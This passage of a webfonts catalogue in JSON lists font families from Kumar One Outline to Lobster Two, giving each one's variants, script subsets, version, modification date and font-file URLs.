      "family": "Kumar One Outline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kumaroneoutline/v6/Noao6VH62pyLP0fsrZ-v18wlUEcX9zDwRQu8EGKF.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kumbh Sans",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v1",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/kumbhsans/v1/c4mm1n92AsfhuCq6tVsagit_3KKVXUv8Los.ttf",
        "regular": "http://fonts.gstatic.com/s/kumbhsans/v1/c4ml1n92AsfhuCq6tVsauodX-Kq-QUI.ttf",
        "700": "http://fonts.gstatic.com/s/kumbhsans/v1/c4mm1n92AsfhuCq6tVsagjt43KKVXUv8Los.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Kurale",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/kurale/v6/4iCs6KV9e9dXjho6eAT3v02QFg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "La Belle Aurore",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/labelleaurore/v11/RrQIbot8-mNYKnGNDkWlocovHeIIG-eFNVmULg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lacquer",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lacquer/v3/EYqzma1QwqpG4_BBB7-AXhttQ5I.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Laila",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/laila/v7/LYjBdG_8nE8jDLzxogNAh14nVcfe.ttf",
        "regular": "http://fonts.gstatic.com/s/laila/v7/LYjMdG_8nE8jDIRdiidIrEIu.ttf",
        "500": "http://fonts.gstatic.com/s/laila/v7/LYjBdG_8nE8jDLypowNAh14nVcfe.ttf",
        "600": "http://fonts.gstatic.com/s/laila/v7/LYjBdG_8nE8jDLyFpANAh14nVcfe.ttf",
        "700": "http://fonts.gstatic.com/s/laila/v7/LYjBdG_8nE8jDLzhpQNAh14nVcfe.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lakki Reddy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lakkireddy/v7/S6u5w49MUSzD9jlCPmvLZQfox9k97-xZ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lalezar",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lalezar/v8/zrfl0HLVx-HwTP82UaDyIiL0RCg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lancelot",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lancelot/v10/J7acnppxBGtQEulG4JY4xJ9CGyAa.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lateef",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v16",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lateef/v16/hESw6XVnNCxEvkbMpheEZo_H_w.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lato",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v17",
      "lastModified": "2020-09-15",
      "files": {
        "100": "http://fonts.gstatic.com/s/lato/v17/S6u8w4BMUTPHh30wWyWrFCbw7A.ttf",
        "100italic": "http://fonts.gstatic.com/s/lato/v17/S6u-w4BMUTPHjxsIPy-vNiPg7MU0.ttf",
        "300": "http://fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh7USew-FGC_p9dw.ttf",
        "300italic": "http://fonts.gstatic.com/s/lato/v17/S6u_w4BMUTPHjxsI9w2PHA3s5dwt7w.ttf",
        "regular": "http://fonts.gstatic.com/s/lato/v17/S6uyw4BMUTPHvxk6XweuBCY.ttf",
        "italic": "http://fonts.gstatic.com/s/lato/v17/S6u8w4BMUTPHjxswWyWrFCbw7A.ttf",
        "700": "http://fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh6UVew-FGC_p9dw.ttf",
        "700italic": "http://fonts.gstatic.com/s/lato/v17/S6u_w4BMUTPHjxsI5wqPHA3s5dwt7w.ttf",
        "900": "http://fonts.gstatic.com/s/lato/v17/S6u9w4BMUTPHh50Xew-FGC_p9dw.ttf",
        "900italic": "http://fonts.gstatic.com/s/lato/v17/S6u_w4BMUTPHjxsI3wiPHA3s5dwt7w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "League Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/leaguescript/v12/CSR54zpSlumSWj9CGVsoBZdeaNNUuOwkC2s.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Leckerli One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/leckerlione/v11/V8mCoQH8VCsNttEnxnGQ-1itLZxcBtItFw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ledger",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ledger/v9/j8_q6-HK1L3if_sxm8DwHTBhHw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lekton",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lekton/v11/SZc43FDmLaWmWpBeXxfonUPL6Q.ttf",
        "italic": "http://fonts.gstatic.com/s/lekton/v11/SZc63FDmLaWmWpBuXR3sv0bb6StO.ttf",
        "700": "http://fonts.gstatic.com/s/lekton/v11/SZc73FDmLaWmWpBm4zjMlWjX4DJXgQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lemon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lemon/v9/HI_EiYEVKqRMq0jBSZXAQ4-d.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lemonada",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/lemonada/v11/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGJOt2mfWc3Z2pTg.ttf",
        "regular": "http://fonts.gstatic.com/s/lemonada/v11/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGeut2mfWc3Z2pTg.ttf",
        "500": "http://fonts.gstatic.com/s/lemonada/v11/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGSOt2mfWc3Z2pTg.ttf",
        "600": "http://fonts.gstatic.com/s/lemonada/v11/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGpOx2mfWc3Z2pTg.ttf",
        "700": "http://fonts.gstatic.com/s/lemonada/v11/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGnex2mfWc3Z2pTg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Deca",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexenddeca/v3/K2F1fZFYk-dHSE0UPPuwQ6qgLS76ZHOM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Exa",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendexa/v3/UMBXrPdOoHOnxExyjdBeWirXArM58BY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Giga",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendgiga/v3/PlI5Fl67Mah5Y8yMHE7lkVxEt8CwfGaD.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Mega",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendmega/v3/qFdA35aBi5JtHD41zSTFEv7K6BsAikI7.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Peta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendpeta/v3/BXRvvFPGjeLPh0kCfI4OkE_1c8Tf1IW3.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Tera",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendtera/v3/RrQUbo98_jt_IXnBPwCWtZhARYMgGtWA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lexend Zetta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lexendzetta/v3/ll87K2KYXje7CdOFnEWcU8soliQejRR7AQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 128",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode128/v10/cIfnMbdUsUoiW3O_hVviCwVjuLtXeJ_A_gMk0izH.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 128 Text",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode128text/v10/fdNv9tubt3ZEnz1Gu3I4-zppwZ9CWZ16Z0w5cV3Y6M90w4k.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 39",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode39/v10/-nFnOHM08vwC6h8Li1eQnP_AHzI2K_d709jy92k.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 39 Extended",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode39extended/v9/8At7Gt6_O5yNS0-K4Nf5U922qSzhJ3dUdfJpwNUgfNRCOZ1GOBw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 39 Extended Text",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode39extendedtext/v9/eLG1P_rwIgOiDA7yrs9LoKaYRVLQ1YldrrOnnL7xPO4jNP68fLIiPopNNA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode 39 Text",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcode39text/v10/sJoa3KhViNKANw_E3LwoDXvs5Un0HQ1vT-031RRL-9rYaw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Barcode EAN13 Text",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v1",
      "lastModified": "2020-11-03",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebarcodeean13text/v1/wlpigxXFDU1_oCu9nfZytgIqSG0XRcJm_OQiB96PAGEki52WfA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Baskerville",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librebaskerville/v9/kmKnZrc3Hgbbcjq75U4uslyuy4kn0pNeYRI4CN2V.ttf",
        "italic": "http://fonts.gstatic.com/s/librebaskerville/v9/kmKhZrc3Hgbbcjq75U4uslyuy4kn0qNcaxYaDc2V2ro.ttf",
        "700": "http://fonts.gstatic.com/s/librebaskerville/v9/kmKiZrc3Hgbbcjq75U4uslyuy4kn0qviTjYwI8Gcw6Oi.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Caslon Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librecaslondisplay/v2/TuGOUUFxWphYQ6YI6q9Xp61FQzxDRKmzr2lRdRhtCC4d.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Caslon Text",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/librecaslontext/v2/DdT878IGsGw1aF1JU10PUbTvNNaDMcq_3eNrHgO1.ttf",
        "italic": "http://fonts.gstatic.com/s/librecaslontext/v2/DdT678IGsGw1aF1JU10PUbTvNNaDMfq91-dJGxO1q9o.ttf",
        "700": "http://fonts.gstatic.com/s/librecaslontext/v2/DdT578IGsGw1aF1JU10PUbTvNNaDMfID8sdjNR-8ssPt.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Libre Franklin",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsSUB9rIb-JH1g.ttf",
        "200": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsWUB9rIb-JH1g.ttf",
        "300": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhcMWUB9rIb-JH1g.ttf",
        "regular": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsWUB9rIb-JH1g.ttf",
        "500": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhHMWUB9rIb-JH1g.ttf",
        "600": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduh8MKUB9rIb-JH1g.ttf",
        "700": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhycKUB9rIb-JH1g.ttf",
        "800": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsKUB9rIb-JH1g.ttf",
        "900": "http://fonts.gstatic.com/s/librefranklin/v6/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhh8KUB9rIb-JH1g.ttf",
        "100italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RdDMTedX1sGE.ttf",
        "200italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8RNDMTedX1sGE.ttf",
        "300italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oYiRNDMTedX1sGE.ttf",
        "italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RNDMTedX1sGE.ttf",
        "500italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZORNDMTedX1sGE.ttf",
        "600italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oaiQ9DMTedX1sGE.ttf",
        "700italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oabQ9DMTedX1sGE.ttf",
        "800italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8Q9DMTedX1sGE.ttf",
        "900italic": "http://fonts.gstatic.com/s/librefranklin/v6/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05obVQ9DMTedX1sGE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Life Savers",
      "variants": [
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lifesavers/v11/ZXuie1UftKKabUQMgxAal_lrFgpbuNvB.ttf",
        "700": "http://fonts.gstatic.com/s/lifesavers/v11/ZXu_e1UftKKabUQMgxAal8HXOS5Tk8fIpPRW.ttf",
        "800": "http://fonts.gstatic.com/s/lifesavers/v11/ZXu_e1UftKKabUQMgxAal8HLOi5Tk8fIpPRW.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lilita One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lilitaone/v8/i7dPIFZ9Zz-WBtRtedDbUEZ2RFq7AwU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lily Script One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lilyscriptone/v8/LhW9MV7ZMfIPdMxeBjBvFN8SXLS4gsSjQNsRMg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Limelight",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/limelight/v11/XLYkIZL7aopJVbZJHDuYPeNGrnY2TA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Linden Hill",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lindenhill/v10/-F61fjxoKSg9Yc3hZgO8ygFI7CwC009k.ttf",
        "italic": "http://fonts.gstatic.com/s/lindenhill/v10/-F63fjxoKSg9Yc3hZgO8yjFK5igg1l9kn-s.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Literata",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v17",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG_F_bcTWCWp8g.ttf",
        "300": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbE-_F_bcTWCWp8g.ttf",
        "regular": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbBG_F_bcTWCWp8g.ttf",
        "500": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbCO_F_bcTWCWp8g.ttf",
        "600": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbM-4F_bcTWCWp8g.ttf",
        "700": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbPa4F_bcTWCWp8g.ttf",
        "800": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG4F_bcTWCWp8g.ttf",
        "900": "http://fonts.gstatic.com/s/literata/v17/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbLi4F_bcTWCWp8g.ttf",
        "200italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7XWSUKTt8iVow.ttf",
        "300italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8obXWSUKTt8iVow.ttf",
        "italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8_7XWSUKTt8iVow.ttf",
        "500italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8zbXWSUKTt8iVow.ttf",
        "600italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8IbLWSUKTt8iVow.ttf",
        "700italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8GLLWSUKTt8iVow.ttf",
        "800italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7LWSUKTt8iVow.ttf",
        "900italic": "http://fonts.gstatic.com/s/literata/v17/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8VrLWSUKTt8iVow.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Liu Jian Mao Cao",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/liujianmaocao/v5/845DNN84HJrccNonurqXILGpvCOoferVKGWsUo8.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Livvic",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-25",
      "files": {
        "100": "http://fonts.gstatic.com/s/livvic/v5/rnCr-x1S2hzjrlffC-M-mHnOSOuk.ttf",
        "100italic": "http://fonts.gstatic.com/s/livvic/v5/rnCt-x1S2hzjrlfXbdtakn3sTfukQHs.ttf",
        "200": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlffp8IeslfCQfK9WQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbdv2s13GY_etWWIJ.ttf",
        "300": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlffw8EeslfCQfK9WQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbduSsF3GY_etWWIJ.ttf",
        "regular": "http://fonts.gstatic.com/s/livvic/v5/rnCp-x1S2hzjrlfnb-k6unzeSA.ttf",
        "italic": "http://fonts.gstatic.com/s/livvic/v5/rnCr-x1S2hzjrlfXbeM-mHnOSOuk.ttf",
        "500": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlffm8AeslfCQfK9WQ.ttf",
        "500italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbdvKsV3GY_etWWIJ.ttf",
        "600": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlfft8ceslfCQfK9WQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbdvmtl3GY_etWWIJ.ttf",
        "700": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlff08YeslfCQfK9WQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbduCt13GY_etWWIJ.ttf",
        "900": "http://fonts.gstatic.com/s/livvic/v5/rnCq-x1S2hzjrlff68QeslfCQfK9WQ.ttf",
        "900italic": "http://fonts.gstatic.com/s/livvic/v5/rnCs-x1S2hzjrlfXbdu6tV3GY_etWWIJ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lobster",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v23",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lobster/v23/neILzCirqoswsqX9_oWsMqEzSJQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lobster Two",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lobstertwo/v13/BngMUXZGTXPUvIoyV6yN59fK7KSJ4ACD.ttf",
